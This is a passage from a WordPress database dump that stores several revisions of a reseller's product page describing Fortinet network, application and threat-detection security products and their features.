Automated Response engine) the FortiSIEM Remediation Library responds to threats with the security tools you have today, and will grow with your enterprise.\r\n<ul>\r\n 	<li><strong>Unified Platform</strong></li>\r\n</ul>\r\nMulti-tenancy for role-based access to a unified platform. Of benefit to MSPâ€™s and Enterprise customers alike â€“ deliver services and reports to a customer or a report. Share actionable intelligence and deliver value without compromise.\r\n\r\n3.Â <strong>User and Entity Behavior Analytics (UEBA)</strong>\r\n\r\nFortinet User and Entity Behavior Analytics (UEBA) technology protects organizations from insider threats by continuously monitoring users and endpoints with automated detection and response capabilities. Leveraging machine learning and advanced analytics, Fortinet UEBA automatically identifies non-compliant, suspicious, or anomalous behavior and rapidly alerts any compromised user accounts. This proactive approach to threat detection delivers an additional layer of protection and visibility, whether users are on or off the corporate network.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Augmented Intelligence (AI)</strong></li>\r\n</ul>\r\nEnhanced data visibility with machine learning and UEBA to identify threats.\r\n<ul>\r\n 	<li><strong>Rapid Threat Detection</strong></li>\r\n</ul>\r\nAI optimizes each stage of the threat investigation pipeline, shining a light on the unknown.\r\n<ul>\r\n 	<li><strong>Regulatory Compliance Support</strong></li>\r\n</ul>\r\nSupport regulatory compliance with a dedicated reporting tool, to respond to and manage potential non-compliant activity.\r\n<ul>\r\n 	<li><strong>Data Security</strong></li>\r\n</ul>\r\nMonitor data movement and endpoint activity 24/7 regardless of location or device, whether users are on or off your network.\r\n<ul>\r\n 	<li><strong>Forensic-level Reporting</strong></li>\r\n</ul>\r\nCompile a full forensic history of user behavior, enabling thorough forensics investigation and detailed reporting.\r\n<ul>\r\n 	<li><strong>Valuable Insights</strong></li>\r\n</ul>\r\nAnalyze data and deliver valuable insights, allowing your team to contain insider threats and respond in real time.\r\n\r\n[maxbutton id=\"1\" ]','Fortinet','','inherit','closed','closed','','1474-revision-v1','','','2019-09-30 11:31:31','2019-09-30 03:31:31','',1474,'https://bintara.com.my/blog/2019/09/30/1474-revision-v1/',0,'revision','',0);
INSERT INTO `wpdp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES (3555,1,'2019-09-30 11:42:18','2019-09-30 03:42:18','<strong style=\"font-size: 2em; color: #000;\">Fortinet</strong> provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our uniqueÂ security fabricÂ combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration.\r\n\r\nFortiGate is available in a wide range of sizes and form factors to fit any environment and provides a broad array of next-generation security and networking functions. Complementary products can be deployed with a FortiGate to enable a simplified, end-to-end security infrastructure covering:\r\n<ul>\r\n 	<li>Network security</li>\r\n 	<li>Multi-Cloud security</li>\r\n 	<li>Web Application Security</li>\r\n 	<li>Email security</li>\r\n 	<li>Advanced Threat Protection</li>\r\n 	<li>Secure Unified Access</li>\r\n 	<li>Endpoint security</li>\r\n 	<li>Management and Analytics</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h2><strong>NETWORK SECURITY</strong></h2>\r\n<h4>1. Next Generation Firewall (NGFW)</h4>\r\nFortiGate enterprise firewalls offer flexible deployments from the network edge to the core, data center, internal segment, and the Cloud. FortiGate enterprise firewalls leverages purpose-built security processors (SPUs) that delivers scalable performance of advanced security services like Threat Protection, SSL inspection, and ultra-low latency for protecting internal segments and mission critical environments.\r\n<h5></h5>\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>High-performance threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nIndustry\'s highest threat protection and SSL inspection performance to protect from malware attacks hiding in encrypted traffic.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Validated security effectiveness</strong></h5>\r\n</li>\r\n</ul>\r\nIndependently certified and continuous threat intelligence updates provide robust protection from known and unknown attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Protect mission critical applications</strong></h5>\r\n</li>\r\n</ul>\r\nHighly scalable segmentation and ultra-low latency to protect network segments.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Continuous risk assessment via automation</strong></h5>\r\n</li>\r\n</ul>\r\nLeverage automated workflow and auditing features to deal with scarce security staff and continuously maintain compliance posture.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntelligently share threats across the entire digital attack surface to provide quick and automated protection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enterprise class security management</strong></h5>\r\n</li>\r\n</ul>\r\nDeliver consistent security policy -- Single pane-of-glass to manage security assets irrespective of location and form factor.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Secure SD-WAN</strong></h4>\r\nFortinet is the only NGFW vendor to provide native SD-WAN along with integrated advanced threat protection. Fortinet, has received the â€œRecommendedâ€ rating for the first ever test conducted by NSS Labs for Software-Defined Wide Area Networking. Fortinet delivered excellent quality of experience for voice and video, high VPN throughput and best price/performance. FortiGate SD-WAN replaces separate WAN routers, WAN optimization, and security devices with a single solution that is application-aware, offers automatic WAN path control and multi-broadband support. It improves application performance, reduces WAN Operating expenses and minimizes management complexity.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>Application aware solution, support a broad range of 3000+ applications as well as granular visibility into sub-applications.</li>\r\n 	<li>Path awareness intelligence to monitor application-level transactions, and dynamically failover to the best available path.</li>\r\n 	<li>Single-pane-of-glass management simplifies deployment, management and monitoring of SD-WAN devices.</li>\r\n 	<li>Reduced complexity and high total cost of ownership by using best of breed SD-WAN and NGFW functionality on a single appliance.</li>\r\n 	<li>Improve cloud application performance by prioritizing business critical applications and enabling branches to directly communicate to the internet.</li>\r\n 	<li>Reduce operating expenses by migrating from MPLS and utilizing multi-broadband such as Ethernet, DSL, and LTE.</li>\r\n</ul>\r\n<h4>3.Â <strong>IPS</strong></h4>\r\nWhether part of a firewall solution or a separate standalone appliance, Intrusion Prevention Systems (IPS) technology is becoming an increasingly ubiquitous part of network security defenses. Fortinet, well known for its next-generation firewall (NGFW) solution, has built IPS technology for more than ten years. Fortinet customers expect and depend on high performance from FortiGate firewalls and FortiGate IPS benefits from this legacy, delivering pound-for-pound, the best IPS performance available in the market today. FortiGate IPS, following a different evolution path than traditional IPS, innovates in ways that other standalone IPS products do not.\r\n\r\n&nbsp;\r\n<h4><strong>Features and Benefits</strong></h4>\r\n<ul>\r\n 	<li><strong>World-class Protection</strong></li>\r\n</ul>\r\nDeep inspection for advanced threats, botnets, zero days and targeted attacks on the network.\r\n<ul>\r\n 	<li><strong>High performance</strong></li>\r\n</ul>\r\nInnovative security processor (SPU) technology for high-performance network throughput and deep security inspection.\r\n<ul>\r\n 	<li><strong>Advanced threat protection</strong></li>\r\n</ul>\r\nSeamless integration â€“ appliance or cloud service â€“ with world-class sandboxing for advanced threats.\r\n<ul>\r\n 	<li><strong>Security Fabric integration</strong></li>\r\n</ul>\r\nIntegration and automation with Fortinetâ€™s broad product portfolio and partner ecosystem.\r\n<ul>\r\n 	<li><strong>Data leak protection</strong></li>\r\n</ul>\r\nFile protection controls to prevent sensitive data exfiltration.\r\n\r\n4.Â <strong>Crypto VPNs</strong>\r\n\r\nMaintaining uniform security policy for all corporate users, applications, devices irrespective of their location and appropriate access control is essential to providing security in a multi-cloud environment. The data in motion must be protected using mutual authentication and confidentiality to protect sensitive corporate data over unprotected networks and provides a defensible proof of security.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Hardware assisted encryption</strong></li>\r\n</ul>\r\nPrevent breaches and secure data in transit at a very high speed.\r\n<ul>\r\n 	<li><strong>Scalable Security</strong></li>\r\n</ul>\r\nScalable security that is seamlessly integrated with routing.\r\n<ul>\r\n 	<li><strong>Comprehensive data communications security</strong></li>\r\n</ul>\r\nProtects Application to Application, User to Users, User to Machine, Machine to Machine communication.\r\n<ul>\r\n 	<li><strong>Diverse VPNs</strong></li>\r\n</ul>\r\nIPsec or SSL based diverse VPNs to offer flexible secure network choices.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nShare FortiTelemetry information across site-to-site tunnels with required confidentiality.\r\n<ul>\r\n 	<li><strong>Unified Management</strong></li>\r\n</ul>\r\nSimplified, easy-to-manage, single pane of glass to manage large scale crypto VPNs, Routing and NGFW.\r\n\r\n5.Â <strong>Secure Web Gateway (SWG)</strong>\r\n\r\nFortinet firewalls with Gateway Security protects enterprises against web attacks with URL filtering, visibility and control of encrypted web traffic via SSL inspection, and application of granular web application policies. Fortinet is the first and only gateway security vendor to earn Virus Bulletinâ€™s VBWeb certification for web filtering effectiveness.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>Feature-rich product that consolidates NGFW and SWG services.</li>\r\n 	<li>Powerful hardware that can perform SSL deep inspection.</li>\r\n 	<li>Anti-malware techniques updated with the latest threat intelligence.</li>\r\n 	<li>Reduce security teamâ€™s workload by providing a single pane of glass management for both NGFW and SWG.</li>\r\n 	<li>Effectively remove blind spots in encrypted traffic, without compromising on performance.</li>\r\n 	<li>Stay protected against the latest known and unknown internet-borne attacks.</li>\r\n</ul>\r\n6.Â <strong>Management &amp; Reporting</strong>\r\n\r\nSecurity teams globally are challenged by resource constraints, both in terms of the number of staff and raw security talent. Moreover, security teams are asked to do more, often in more complex networks and with growing numbers of alerts from multiple systems. Successful security teams allay these challenges by implementing three best practices. First, they simplify the way view management, combining operation NOC-style views with security-based SOC context. Second, they regularly measure and score their security effectiveness, enabling them anytime to answer how secure they are. Third, they demand deep integration so they can automate repetitive actions, especially across silos when possible.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Operationalized Visibility</strong></li>\r\n</ul>\r\nBig picture perspective allows you to see the forest through the tree.\r\n<ul>\r\n 	<li><strong>Cross Silo Automation</strong></li>\r\n</ul>\r\nDeeper than mere integration, orchestrate workflow responses to triggered security events.\r\n<ul>\r\n 	<li><strong>Simplified Management</strong></li>\r\n</ul>\r\nStreamline deployment and management, reducing task time and improving response time.\r\n<ul>\r\n 	<li><strong>Rapid Detection</strong></li>\r\n</ul>\r\nConsolidate telemetry and alerts to uncover patterns and discover security insights.\r\n<ul>\r\n 	<li><strong>Fortinet Fabric</strong></li>\r\n</ul>\r\nCentralized control over all of your Fortinet network assets.\r\n<h3>INFRASTRUCTURE PROTECTION</h3>\r\n<ol>\r\n 	<li><strong>Endpoint Protection</strong></li>\r\n</ol>\r\nEndpoints are frequently the target of initial compromise or attacks. FortiClient strengthens endpoint security through integrated visibility, control, and proactive defense. With the ability to discover, monitor, and assess endpoint risks, you can ensure endpoint compliance, mitigate risks, and reduce exposure. FortiClient proactively defends against advanced attacks. Its tight integration with the Security Fabric enables policy-based automation to contain threats and control outbreaks. FortiClient is compatible with Fabric-Ready partners to further strengthen enterprisesâ€™ security posture.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad endpoint visibility</strong></li>\r\n</ul>\r\nFortiClient Fabric Agent integrates endpoints into the Security Fabric and provides endpoint telemetry, including user identity, protection status, risk scores, unpatched vulnerabilities, security events, and more.\r\n<ul>\r\n 	<li><strong>Proactive endpoint defense</strong></li>\r\n</ul>\r\nAnti-exploit, sandbox integration, and behavior and pattern-based malware detection proactively detect and block malware, malicious scripts, document-based, and other advanced attacks.\r\n<ul>\r\n 	<li><strong>Automated threat containment</strong></li>\r\n</ul>\r\nIntegration with the Security Fabric enables automated response. Mitigate unpatched vulnerabilities, alert users, and quarantine risky or compromised endpoints to stem an outbreak.\r\n<ul>\r\n 	<li><strong>Secure remote access</strong></li>\r\n</ul>\r\nReliable, simple, and secure remote access with built-in, always-on VPN, with the added security of two-factor authentication, plus single-sign-on capabilities.\r\n<ul>\r\n 	<li><strong>Easy to deploy and manage</strong></li>\r\n</ul>\r\nEasy to deploy and manage Modular and light-weight endpoint agents are centrally managed with the Enterprise Manager Server (EMS). Fabric Agent is compatible with Fabric-Ready endpoint security solutions.\r\n\r\n2.Â <strong>Wireless</strong>\r\n\r\nFortinet provides a full suite of Wi-Fi Access Point and WLAN Controller products as part of our Secure Access solution designed to address the unique requirements of every organization. For assistance choosing an AP, our AP Product selector can be found here. Configuration and control of your wireless environment can be done directly with a FortiGate or via our dedicated Wireless LAN controllers. Fortinet also offers FortiManager and FortiCloud as management solutions for the entire Fortinet security fabric. All Fortinetâ€™s wireless solutions integrate with our location analytics platform: FortiPresence. This enables real-time locationing and device tracking.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nIntegration with FortiGate firewalls extends your security fabric out to the edge of the network.\r\n<ul>\r\n 	<li><strong>Superior density, scalability and mobilit</strong><strong>y</strong></li>\r\n</ul>\r\nHandle even the most complex RF environments.\r\n<ul>\r\n 	<li><strong>Zero-touch deployment</strong></li>\r\n</ul>\r\nFast and simple deployment with no requirements for onsite tech support.\r\n<ul>\r\n 	<li><strong>Simplified deployment and capacity expansion</strong></li>\r\n</ul>\r\nNo licenses to manage, just plug and go.\r\n<ul>\r\n 	<li><strong>Free location and analytics</strong></li>\r\n</ul>\r\nWireless device locationing tools included with no additional licenses required.\r\n<ul>\r\n 	<li><strong>Scalability from 1 to 10,000 APs</strong></li>\r\n</ul>\r\nA range of platforms for any sized deployment.\r\n\r\n3.Â <strong>Switching</strong>\r\n\r\nLegacy Ethernet LANs face many challenges including exponential growth in devices and applications, increased throughput demands from wireless LANs, and complex security implementations. Rather than asking how to secure traditional Ethernet LANs, Fortinet takes a security centric approach offering Ethernet as an extension of the security infrastructure through FortiSwitch and FortiLink. FortiSwitch offers a broad portfolio of secure, simple, and scalable Ethernet switches for applications that range from desktop to data center.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration with FortiLink</strong></li>\r\n</ul>\r\nFortiGate management of FortiSwitch extends Security Fabric features to the Ethernet access layer.\r\n<ul>\r\n 	<li><strong>No Touch Provisioning and Management with FortiLink</strong></li>\r\n</ul>\r\nAuto discovery, Global VLAN and Security Policies, Firewall interfaces and Ethernet ports equally secure.\r\n<ul>\r\n 	<li><strong>Highly Scalable</strong></li>\r\n</ul>\r\nBroad portfolio of stackable 1, 10, and 40 GE access ports with up to 100 GE uplinks to scale from desktop to datacenter.\r\n<ul>\r\n 	<li><strong>Unparalleled Visibility</strong></li>\r\n</ul>\r\nSingle pane of glass management of both Security and Network Access, Device detection and port visibility.\r\n<ul>\r\n 	<li><strong>Enable voice, data, and wireless traffic across a single network</strong></li>\r\n</ul>\r\nPower network and IoT devices with POE, Auto provision using LLDP-MED.\r\n<ul>\r\n 	<li><strong>Virtual Stacking</strong></li>\r\n</ul>\r\nFortiLink enables stacking across IDFs when managed, up to 300 switches based on FortiGate model.\r\n\r\n4.Â <strong>Email Security</strong>\r\n\r\nEmail security remains a key productivity tool for today\'s organizations, as well as a successful attack vector for cyber criminals. FortiMail Email security utilizes the latest technologies and security services from FortiGuard Labs to deliver consistently top-rated protection from common and advanced threats while integrating robust data protection capabilities to avoid data loss.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Top-rated Antispam and Antiphishing</strong></li>\r\n</ul>\r\nMaintain productivity by shielding end users from unwanted spam and malicious phishing attacks.\r\n<ul>\r\n 	<li><strong>Independently certified advanced threat defense</strong></li>\r\n</ul>\r\nThwart cyber criminals intent on stealing data, holding systems for ransomware, conducting fraud, and other malicious purposes.\r\n<ul>\r\n 	<li><strong>Integrated data protection</strong></li>\r\n</ul>\r\nMaintain the privacy of personal information and confidentiality of sensitive data in compliance with regulatory and corporate guidelines.\r\n<ul>\r\n 	<li><strong>High-performance mail handling</strong></li>\r\n</ul>\r\nSpeed the delivery of legitimate email at an affordable cost.\r\n<ul>\r\n 	<li><strong>Enterprise-class management</strong></li>\r\n</ul>\r\nFree staff and end users to drive the business by reducing time spent on email administration.\r\n<h3>APPLICATION SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Web Application Firewall (WAF)</strong></li>\r\n</ol>\r\nUnprotected web applications are the easiest point of entry for hackers and vulnerable to a number of attack types. FortiWebâ€™s AI-enhanced and multi-layered approach protects your web apps from the OWASP Top 10 and more. When combined with our Web Application Security Service from FortiGuard Labs youâ€™re protected from the latest application vulnerabilities, bots, and suspicious URLs, and with dual machine learning detection engines your applications are safe from sophisticated threats such as SQL injection, cross-site scripting, buffer overflows, cookie poisoning, malicious sources, and DoS attacks.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Proven Web Application Protection</strong></li>\r\n</ul>\r\nFortiWeb protects against all the OWASP Top-10 threats, DDoS attacks and many others to defend your mission critical web-based applications.\r\n<ul>\r\n 	<li><strong>AI-based Threat Detection</strong></li>\r\n</ul>\r\nIn addition to regular signature updates and many other layers of defenses, FortiWebâ€™s AI-based, dual-layer machine learning engines protect against zero-day attacks.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nIntegration with FortiGate firewalls and FortiSandbox deliver protection from advanced persistent threats.\r\n<ul>\r\n 	<li><strong>Hardware-based Acceleration</strong></li>\r\n</ul>\r\nFortiWeb delivers industry-leading protected WAF throughputs and blazing fast secure traffic encryption/decryption.\r\n<ul>\r\n 	<li><strong>False Positive Mitigation Tools</strong></li>\r\n</ul>\r\nAdvanced tools that minimize the day-to-day management of policies and exception lists to ensure only unwanted traffic is blocked.\r\n<ul>\r\n 	<li><strong>Advanced Visual Analytics</strong></li>\r\n</ul>\r\nFortiWebâ€™s visual reporting tools provide detailed analyses of attack sources, types and other elements that provide insights not available with other WAF solutions.\r\n\r\n2.Â <strong>Application Delivery Controller</strong>\r\n\r\nWith bandwidth demand growing faster than budgets and cyber-attacks constantly on the rise, it can be challenging to securely and efficiently deliver applications at the speed your users expect. Fortinet Application Delivery Controller (ADC) appliances optimize the availability, user experience, and scalability of enterprise application delivery. They enable fast, secure, and intelligent acceleration and distribution of even the most demanding enterprise applications.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Secure Traffic Management</strong></li>\r\n</ul>\r\nSSL offloading, forward proxy and visibility increase responsiveness and assist in scanning for threats.\r\n<ul>\r\n 	<li><strong>Application Optimization</strong></li>\r\n</ul>\r\nSpeed web application delivery with compression, caching, HTTP 2.0, and HTTP Page Speed-UP.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nAV and Sandbox integration scans attachments to protect from the latest threats.\r\n<ul>\r\n 	<li><strong>Global Server Load Balancing</strong></li>\r\n</ul>\r\nDistributes traffic across multiple geographical locations for disaster recovery.\r\n<ul>\r\n 	<li><strong>Security Features</strong></li>\r\n</ul>\r\nWeb Application Firewall, Web Filtering, and IP Reputation for enhanced security.\r\n\r\n3.Â <strong>DDoS</strong>\r\n\r\nDistributed Denial of Service (DDoS) attacks are ever-evolving and use a variety of technologies. To successfully combat these attacks, you need a dynamic, multi-layered security solution. FortiDDoS protects from both known and zero day attacks with very low latency. Itâ€™s easy to deploy and manage, and includes comprehensive reporting and analysis tools.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>100% security processor (SPU)-based layer 3, 4, and 7 DDoS protection application-aware traffic management.</li>\r\n 	<li>Ability to monitor hundreds of thousands of parameters simultaneously.</li>\r\n 	<li>Behavior-based DDoS protection to eliminate need for signature files.</li>\r\n 	<li>Minimal false-positive detections through continuous threat evaluation.</li>\r\n 	<li>Attack protection for DNS services via specialized tools.</li>\r\n 	<li>Defense against every DDoS attack: bulk volumetric, layer 7 application, and SSL/HTTPS.</li>\r\n</ul>\r\n<h3>THREAT DETECTION &amp; PREVENTION</h3>\r\n<ol>\r\n 	<li><strong>Sandbox</strong></li>\r\n</ol>\r\nWith the increasing volume and sophistication of cyber-attacks, it takes only one threat to slip through security for a data breach to occur. CISOs have adopted sandboxing as an essential component of their security strategies to help combat previously unknown threats. While attack surfaces are becoming more dynamic due to the rise of IoT and cloud-based services, a continuing shortage of cyber security talent is driving organizations to integrate sandboxing with greater controls and a high degree of automation.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad integration</strong></li>\r\n</ul>\r\nExtends advanced threat protection to your next-generation firewall, web application firewall, secure email gateway, and endpoint protection platform.\r\n<ul>\r\n 	<li><strong>Intelligent automation</strong></li>\r\n</ul>\r\nSpeeds mitigation by sharing real-time updates to disrupt threats at the origin and subsequent immunization across the entire organization and the global community.\r\n<ul>\r\n 	<li><strong>All-in-one</strong></li>\r\n</ul>\r\nSimplifies deployment and reduces complexity by covering all protocols in a single common sandbox platform.\r\n<ul>\r\n 	<li><strong>Flexible deployment</strong></li>\r\n</ul>\r\nAvailable as a physical or virtual appliance on premises, as well as a cloud-based or managed service.\r\n<ul>\r\n 	<li><strong>Open extensibility</strong></li>\r\n</ul>\r\nFlexible APIs for easy third-party integration and available day-zero integration with Fabric-Ready partners.\r\n\r\n2.Â <strong>FortiSIEM</strong>\r\n\r\nSecurity management only gets more complex. Endpoints, IoT, Infrastructure, Security Tools, Applications, VMâ€™s and Cloud â€“ the number of things you need to secure and monitor grows constantly. FortiSIEM â€“ Fortinetâ€™s Multivendor Security Incident and Events Management solution brings it all together. Visibility, Correlation, Automated Response and Remediation in a single, scalable solution. Using a Business Services view, the complexity of managing network and security operations is reduced, freeing resources, improving breach detection. Worldwide 80% of breaches go undetected because of skills shortage and event information â€˜noiseâ€™. FortiSIEM provides the cross correlation, applies machine learning and UEBA to improve response, to stop breaches before they occur.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Asset Self-Discovery</strong></li>\r\n</ul>\r\nVisibility needs to be both comprehensive and granular â€“ understanding a devices contextual capabilities and vulnerabilities reduces false positives.\r\n<ul>\r\n 	<li><strong>Rapid Integrations and Scalability</strong></li>\r\n</ul>\r\nNetwork aware and security tool agnostic operations and management get a real-time business view of availability, utilization and security posture.\r\n<ul>\r\n 	<li><strong>Automated Workflow</strong></li>\r\n</ul>\r\nA leading SOAR (Security Orchestration and Automated Response engine) the FortiSIEM Remediation Library responds to threats with the security tools you have today, and will grow with your enterprise.\r\n<ul>\r\n 	<li><strong>Unified Platform</strong></li>\r\n</ul>\r\nMulti-tenancy for role-based access to a unified platform. Of benefit to MSPâ€™s and Enterprise customers alike â€“ deliver services and reports to a customer or a report. Share actionable intelligence and deliver value without compromise.\r\n\r\n3.Â <strong>User and Entity Behavior Analytics (UEBA)</strong>\r\n\r\nFortinet User and Entity Behavior Analytics (UEBA) technology protects organizations from insider threats by continuously monitoring users and endpoints with automated detection and response capabilities. Leveraging machine learning and advanced analytics, Fortinet UEBA automatically identifies non-compliant, suspicious, or anomalous behavior and rapidly alerts any compromised user accounts. This proactive approach to threat detection delivers an additional layer of protection and visibility, whether users are on or off the corporate network.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Augmented Intelligence (AI)</strong></li>\r\n</ul>\r\nEnhanced data visibility with machine learning and UEBA to identify threats.\r\n<ul>\r\n 	<li><strong>Rapid Threat Detection</strong></li>\r\n</ul>\r\nAI optimizes each stage of the threat investigation pipeline, shining a light on the unknown.\r\n<ul>\r\n 	<li><strong>Regulatory Compliance Support</strong></li>\r\n</ul>\r\nSupport regulatory compliance with a dedicated reporting tool, to respond to and manage potential non-compliant activity.\r\n<ul>\r\n 	<li><strong>Data Security</strong></li>\r\n</ul>\r\nMonitor data movement and endpoint activity 24/7 regardless of location or device, whether users are on or off your network.\r\n<ul>\r\n 	<li><strong>Forensic-level Reporting</strong></li>\r\n</ul>\r\nCompile a full forensic history of user behavior, enabling thorough forensics investigation and detailed reporting.\r\n<ul>\r\n 	<li><strong>Valuable Insights</strong></li>\r\n</ul>\r\nAnalyze data and deliver valuable insights, allowing your team to contain insider threats and respond in real time.\r\n\r\n[maxbutton id=\"1\" ]','Fortinet','','inherit','closed','closed','','1474-revision-v1','','','2019-09-30 11:42:18','2019-09-30 03:42:18','',1474,'https://bintara.com.my/blog/2019/09/30/1474-revision-v1/',0,'revision','',0),(3553,1,'2019-09-30 11:39:21','2019-09-30 03:39:21','<strong style=\"font-size: 2em; color: #000;\">Fortinet</strong> provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our uniqueÂ security fabricÂ combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration.\r\n\r\nFortiGate is available in a wide range of sizes and form factors to fit any environment and provides a broad array of next-generation security and networking functions. Complementary products can be deployed with a FortiGate to enable a simplified, end-to-end security infrastructure covering:\r\n<ul>\r\n 	<li>Network security</li>\r\n 	<li>Multi-Cloud security</li>\r\n 	<li>Web Application Security</li>\r\n 	<li>Email security</li>\r\n 	<li>Advanced Threat Protection</li>\r\n 	<li>Secure Unified Access</li>\r\n 	<li>Endpoint security</li>\r\n 	<li>Management and Analytics</li>\r\n</ul>\r\n<h3></h3>\r\n<h2><strong>NETWORK SECURITY</strong></h2>\r\n<ol>\r\n 	<li>\r\n<h4><strong>Next Generation Firewall (NGFW)</strong></h4>\r\n</li>\r\n</ol>\r\nFortiGate enterprise firewalls offer flexible deployments from the network edge to the core, data center, internal segment, and the Cloud. FortiGate enterprise firewalls leverages purpose-built security processors (SPUs) that delivers scalable performance of advanced security services like Threat Protection, SSL inspection, and ultra-low latency for protecting internal segments and mission critical environments.\r\n<h5></h5>\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>High-performance threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nIndustry\'s highest threat protection and SSL inspection performance to protect from malware attacks hiding in encrypted traffic.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Validated security effectiveness</strong></h5>\r\n</li>\r\n</ul>\r\nIndependently certified and continuous threat intelligence updates provide robust protection from known and unknown attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Protect mission critical applications</strong></h5>\r\n</li>\r\n</ul>\r\nHighly scalable segmentation and ultra-low latency to protect network segments.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Continuous risk assessment via automation</strong></h5>\r\n</li>\r\n</ul>\r\nLeverage automated workflow and auditing features to deal with scarce security staff and continuously maintain compliance posture.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntelligently share threats across the entire digital attack surface to provide quick and automated protection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enterprise class security management</strong></h5>\r\n</li>\r\n</ul>\r\nDeliver consistent security policy -- Single pane-of-glass to manage security assets irrespective of location and form factor.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Secure SD-WAN</strong></h4>\r\nFortinet is the only NGFW vendor to provide native SD-WAN along with integrated advanced threat protection. Fortinet, has received the â€œRecommendedâ€ rating for the first ever test conducted by NSS Labs for Software-Defined Wide Area Networking. Fortinet delivered excellent quality of experience for voice and video, high VPN throughput and best price/performance. FortiGate SD-WAN replaces separate WAN routers, WAN optimization, and security devices with a single solution that is application-aware, offers automatic WAN path control and multi-broadband support. It improves application performance, reduces WAN Operating expenses and minimizes management complexity.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>Application aware solution, support a broad range of 3000+ applications as well as granular visibility into sub-applications.</li>\r\n 	<li>Path awareness intelligence to monitor application-level transactions, and dynamically failover to the best available path.</li>\r\n 	<li>Single-pane-of-glass management simplifies deployment, management and monitoring of SD-WAN devices.</li>\r\n 	<li>Reduced complexity and high total cost of ownership by using best of breed SD-WAN and NGFW functionality on a single appliance.</li>\r\n 	<li>Improve cloud application performance by prioritizing business critical applications and enabling branches to directly communicate to the internet.</li>\r\n 	<li>Reduce operating expenses by migrating from MPLS and utilizing multi-broadband such as Ethernet, DSL, and LTE.</li>\r\n</ul>\r\n<h4>3.Â <strong>IPS</strong></h4>\r\nWhether part of a firewall solution or a separate standalone appliance, Intrusion Prevention Systems (IPS) technology is becoming an increasingly ubiquitous part of network security defenses. Fortinet, well known for its next-generation firewall (NGFW) solution, has built IPS technology for more than ten years. Fortinet customers expect and depend on high performance from FortiGate firewalls and FortiGate IPS benefits from this legacy, delivering pound-for-pound, the best IPS performance available in the market today. FortiGate IPS, following a different evolution path than traditional IPS, innovates in ways that other standalone IPS products do not.\r\n\r\n&nbsp;\r\n<h4><strong>Features and Benefits</strong></h4>\r\n<ul>\r\n 	<li><strong>World-class Protection</strong></li>\r\n</ul>\r\nDeep inspection for advanced threats, botnets, zero days and targeted attacks on the network.\r\n<ul>\r\n 	<li><strong>High performance</strong></li>\r\n</ul>\r\nInnovative security processor (SPU) technology for high-performance network throughput and deep security inspection.\r\n<ul>\r\n 	<li><strong>Advanced threat protection</strong></li>\r\n</ul>\r\nSeamless integration â€“ appliance or cloud service â€“ with world-class sandboxing for advanced threats.\r\n<ul>\r\n 	<li><strong>Security Fabric integration</strong></li>\r\n</ul>\r\nIntegration and automation with Fortinetâ€™s broad product portfolio and partner ecosystem.\r\n<ul>\r\n 	<li><strong>Data leak protection</strong></li>\r\n</ul>\r\nFile protection controls to prevent sensitive data exfiltration.\r\n\r\n4.Â <strong>Crypto VPNs</strong>\r\n\r\nMaintaining uniform security policy for all corporate users, applications, devices irrespective of their 